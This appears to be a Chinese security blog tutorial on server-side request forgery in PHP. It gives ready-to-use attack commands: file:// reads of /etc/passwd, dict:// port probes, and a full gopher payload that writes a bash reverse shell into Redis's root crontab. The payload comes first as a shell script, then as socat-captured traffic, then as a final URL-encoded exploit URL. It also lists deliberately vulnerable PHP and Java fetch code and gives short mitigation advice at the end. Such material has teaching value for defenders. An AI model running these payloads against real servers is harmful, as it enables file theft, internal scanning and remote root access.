SSRF in PHP

admin

1. 漏洞简介

SSRF(Server-side Request Forge, 服务端请求伪造)。
由攻击者构造的攻击链接传给服务端执行造成的漏洞，一般用来在外网探测或攻击内网服务。

2. 漏洞利用

自从煤老板的paper放出来过后，SSRF逐渐被大家利用和重视起来。

2.1 本地利用

拿PHP常出现问题的cURL举例。

可以看到cURL支持大量的协议，别入file,dict,gopher,http

1. ➜  pentest curl -V
   
2. curl 7.43.0 (x86_64-apple-darwin15.0) libcurl/7.43.0 SecureTransport zlib/1.2.5
   
3. Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtsp smb smbs smtp smtps telnet tftp
   
4. Features: AsynchDNS IPv6 Largefile GSS-API Kerberos SPNEGO NTLM NTLM_WB SSL libz UnixSockets

复制代码

本地利用姿势：

1. # 利用file协议查看文件
   
2. curl -v 'file:///etc/passwd'
   
3. 
   
4. # 利用dict探测端口
   
5. curl -v 'dict://127.0.0.1:22'
   
6. curl -v 'dict://127.0.0.1:6379/info'
   
7. 
   
8. # 利用gopher协议反弹shell
   
9. curl -v 'gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$56%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a'

复制代码

漏洞代码ssrf.php（未做任何SSRF防御）

1. function curl($url){  
   
2.     $ch = curl_init();
   
3.     curl_setopt($ch, CURLOPT_URL, $url);
   
4.     curl_setopt($ch, CURLOPT_HEADER, 0);
   
5.     curl_exec($ch);
   
6.     curl_close($ch);
   
7. }
   
8. 
   
9. $url = $_GET['url'];
   
10. curl($url);

复制代码

远程利用方式：

1. # 利用file协议任意文件读取
   
2. curl -v 'http://sec.com:8082/sec/ssrf.php?url=file:///etc/passwd'
   
3. 
   
4. # 利用dict协议查看端口
   
5. curl -v 'http://sec.com:8082/sec/ssrf.php?url=dict://127.0.0.1:22'
   
6. 
   
7. # 利用gopher协议反弹shell
   
8. curl -v 'http://sec.com:8082/sec/ssrf.php?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2456%250d%250a%250d%250a%250a%250a%2A%2F1%20%2A%20%2A%20%2A%20%2A%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F127.0.0.1%2F2333%200%3E%261%250a%250a%250a%250d%250a%250d%250a%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2A1%250d%250a%244%250d%250asave%250d%250a%2A1%250d%250a%244%250d%250aquit%250d%250a'

复制代码

漏洞代码ssrf2.php

• 限制协议为HTTP、HTTPS
• 设置跳转重定向为True（默认不跳转）
  

1. <?php
   
2. function curl($url){
   
3.     $ch = curl_init();
   
4.     curl_setopt($ch, CURLOPT_URL, $url);
   
5.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
   
6.     // 限制为HTTPS、HTTP协议
   
7.     curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
   
8.     curl_setopt($ch, CURLOPT_HEADER, 0);
   
9.     curl_exec($ch);
   
10.     curl_close($ch);
    
11. }
    
12. 
    
13. $url = $_GET['url'];
    
14. curl($url);
    
15. ?>

复制代码

此时，再使用dict协议已经不成功。

1. http://sec.com:8082/sec/ssrf2.php?url=dict://127.0.0.1:6379/info

复制代码

302跳转没测试成功。下次再测试下……

3. 如何转换成gopher协议

我刚一开始看到这个协议，有点一脸懵逼，不知道如何转换。希望写点经验给大家，有不对的地方，还望指出。

3.1 redis反弹shell

先写一个redis反弹shell的bash脚本如下：
我不喜欢用flushall，太不友好。

1. echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\n\n"|redis-cli -h $1 -p $2 -x set 1
   
2. redis-cli -h $1 -p $2 config set dir /var/spool/cron/
   
3. redis-cli -h $1 -p $2 config set dbfilename root
   
4. redis-cli -h $1 -p $2 save
   
5. redis-cli -h $1 -p $2 quit

复制代码

该代码很简单，在redis的第0个数据库中添加key为1，value为\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\n\n\n的字段。最后会多出一个\n是因为echo重定向最后会自带一个换行符。

执行脚本命令：

1. bash shell.sh 127.0.0.1 6379

复制代码

执行完脚本后：

1. 127.0.0.1:6379> keys *
   
2. 1) "name"
   
3. 2) "1"
   
4. 127.0.0.1:6379> get name
   
5. "joychou"
   
6. 127.0.0.1:6379> get 1
   
7. "\n\n*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\n\n\n"

复制代码

想抓tcp数据包，我们可以使用socat进行端口转发。
转发命令如下：

1. socat -v tcp-listen:4444,fork tcp-connect:localhost:6379

复制代码

意思是将本地的4444端口转发到本地的6379端口。
即，有人访问该服务器的4444端口，访问的其实是该服务器的6379 redis服务。

所以，我们执行以下命令就可以了：

1. bash shell.sh 127.0.0.1 4444

复制代码

返回如下：

1. root@pentest:~/joychou/redis# socat -v tcp-listen:4444,fork tcp-connect:localhost:6379
   
2. > 2017/03/28 17:18:50.701362  length=83 from=0 to=82
   
3. *3\r
   
4. $3\r
   
5. set\r
   
6. $1\r
   
7. 1\r
   
8. $56\r
   
9. 
   
10. 
    
11. */1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1
    
12. 
    
13. 
    
14. \r
    
15. < 2017/03/28 17:18:50.702358  length=5 from=0 to=4
    
16. +OK\r
    
17. > 2017/03/28 17:18:50.706954  length=57 from=0 to=56
    
18. *4\r
    
19. $6\r
    
20. config\r
    
21. $3\r
    
22. set\r
    
23. $3\r
    
24. dir\r
    
25. $16\r
    
26. /var/spool/cron/\r
    
27. < 2017/03/28 17:18:50.707996  length=5 from=0 to=4
    
28. +OK\r
    
29. > 2017/03/28 17:18:50.713159  length=52 from=0 to=51
    
30. *4\r
    
31. $6\r
    
32. config\r
    
33. $3\r
    
34. set\r
    
35. $10\r
    
36. dbfilename\r
    
37. $4\r
    
38. root\r
    
39. < 2017/03/28 17:18:50.713982  length=5 from=0 to=4
    
40. +OK\r
    
41. > 2017/03/28 17:18:50.718505  length=14 from=0 to=13
    
42. *1\r
    
43. $4\r
    
44. save\r
    
45. < 2017/03/28 17:18:50.727510  length=5 from=0 to=4
    
46. +OK\r
    
47. > 2017/03/28 17:18:50.730592  length=14 from=0 to=13
    
48. *1\r
    
49. $4\r
    
50. quit\r
    
51. < 2017/03/28 17:18:50.730839  length=5 from=0 to=4
    
52. +OK\r

复制代码

gopher转换规则如下：

• 如果第一个字符是>或者<那么丢弃该行字符串，表示请求和返回的时间。
• 如果前3个字符是+OK 那么丢弃该行字符串，表示返回的字符串。
• 将\r字符串替换成%0d%0a
• 空白行替换为%0a
  

替换后的结果为：

1. *3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$56%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

复制代码

gopher协议使用方法：gopher://ip:port/_payload

接着将下面payload进行rawurlencode，可以使用php的该函数。

1. gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$56%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

复制代码

最后的URL攻击payload为：

1. curl -v 'http://sec.com:8082/sec/ssrf.php?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2456%250d%250a%250d%250a%250a%250a%2A%2F1%20%2A%20%2A%20%2A%20%2A%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F127.0.0.1%2F2333%200%3E%261%250a%250a%250a%250d%250a%250d%250a%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a%2A4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2A1%250d%250a%244%250d%250asave%250d%250a%2A1%250d%250a%244%250d%250aquit%250d%250a'

复制代码

4. 漏洞代码4.1 php

1. // 漏洞代码1
   
2. function curl($url){  
   
3.     $ch = curl_init();
   
4.     curl_setopt($ch, CURLOPT_URL, $url);
   
5.     curl_setopt($ch, CURLOPT_HEADER, 0);
   
6.     curl_exec($ch);
   
7.     curl_close($ch);
   
8. }
   
9. 
   
10. $url = $_GET['url'];
    
11. curl($url);  
    
12. 
    
13. 
    
14. 
    
15. // 漏洞代码2
    
16. $url = $_GET['url'];;
    
17. echo file_get_contents($url);
    
18. 
    
19. 
    
20. 
    
21. // 漏洞代码3
    
22. function GetFile($host,$port,$link)
    
23. {
    
24.     $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    
25.     if (!$fp)
    
26.     {
    
27.         echo "$errstr (error number $errno) \n";
    
28.     }
    
29.     else
    
30.     {
    
31.         $out = "GET $link HTTP/1.1\r\n";
    
32.         $out .= "Host: $host\r\n";
    
33.         $out .= "Connection: Close\r\n\r\n";
    
34.         $out .= "\r\n";
    
35.         fwrite($fp, $out);
    
36.         $contents='';
    
37.         while (!feof($fp))
    
38.         {
    
39.             $contents.= fgets($fp, 1024);
    
40.         }
    
41.         fclose($fp);
    
42.         return $contents;
    
43.     }
    
44. }
    
45. 
    

复制代码

4.2 java

org.apache.http.client.methods.HttpGet

1.     public static void ssrfhttpget()
   
2.     {
   
3. 
   
4.         String url = "http://127.0.0.1:8000";
   
5. 
   
6.         CloseableHttpClient client = HttpClients.createDefault();
   
7.         HttpGet httpGet = new HttpGet(url);
   
8.         HttpResponse httpResponse;
   
9.         try {
   
10.             httpResponse = client.execute(httpGet);
    
11. 
    
12.             System.out.println("\nSending 'GET' request to URL : " + url);
    
13.             System.out.println("Response Code : " +
    
14.                     httpResponse.getStatusLine().getStatusCode());
    
15. 
    
16.             BufferedReader rd = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));
    
17. 
    
18.             StringBuffer result = new StringBuffer();
    
19.             String line = "";
    
20.             while ((line = rd.readLine()) != null) {
    
21.                 result.append(line);
    
22.             }
    
23. 
    
24.             System.out.println(result.toString());
    
25.         }catch (Exception e) {
    
26.             e.printStackTrace();
    
27.         }
    
28. 
    
29.     }

复制代码

HttpURLConnection (java.net.HttpURLConnection)

1.     public static void ssrfurlconnection()
   
2.     {
   
3.         try {
   
4.             //String url = "dict://127.0.0.1:8080";
   
5.             String url = "file:///etc/passwd";
   
6. 
   
7.             URL obj = new URL(url);
   
8.             HttpURLConnection conn = (HttpURLConnection) obj.openConnection();
   
9.             conn.setReadTimeout(5000);
   
10.             conn.addRequestProperty("Accept-Language", "en-US,en;q=0.8");
    
11.             conn.addRequestProperty("User-Agent", "Mozilla");
    
12.             conn.addRequestProperty("Referer", "http://baidu.com");
    
13. 
    
14.             System.out.println("Request URL ... " + url);
    
15. 
    
16.             int status = conn.getResponseCode();
    
17.             System.out.println("Response Code ... " + status);
    
18. 
    
19.             if (status == HttpURLConnection.HTTP_OK) {
    
20.                 BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
    
21.                 String inputLine;
    
22.                 StringBuffer html = new StringBuffer();
    
23. 
    
24.                 while ((inputLine = in.readLine()) != null) {
    
25.                     html.append(inputLine);
    
26.                 }
    
27.                 in.close();
    
28. 
    
29.                 System.out.println("URL Content: \n" + html.toString());
    
30.                 System.out.println("Done");
    
31. 
    
32.             }
    
33.         } catch (Exception e) {
    
34.             e.printStackTrace();
    
35.         }
    
36.     }

复制代码

测试的过程中，java都不支持除了http、https协议的其他协议。

5. 漏洞修复

• 限制协议为HTTP、HTTPS
• 禁止30x跳转
• 限制ip为内网ip
  

6. Reference

• SSRF to GETSHELL
• 利用 gopher 协议拓展攻击面
• WAVR SSRF
  

from:http://joychou.org/index.php/web/phpssrf.html